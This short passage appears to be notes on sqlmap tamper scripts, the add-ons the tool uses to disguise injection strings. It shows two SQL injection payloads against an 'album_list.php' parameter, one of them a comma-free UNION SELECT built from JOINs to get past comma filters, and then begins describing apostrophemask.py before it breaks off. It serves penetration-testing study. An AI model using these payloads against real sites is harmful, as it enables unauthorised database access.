sqlmap tamper script roundup

Multiple scripts can be used at once, separated by commas.

album_list.php?album_sn=20 and 1=12 UNION SELECT * FROM 1,2,3,4,5,6,
album_list.php?album_sn=20 and 1=12 UNION SELECT * FROM ((SELECT 1)a JOIN (SELECT 2)b JOIN (SELECT 3)c JOIN (SELECT 4)d JOIN (SELECT 5)e JOIN (SELECT 6)f)#

Filter commas

apostrophemask.py: replaces quotes with UTF-8
Example: ("1 AND '1'='1") '1 …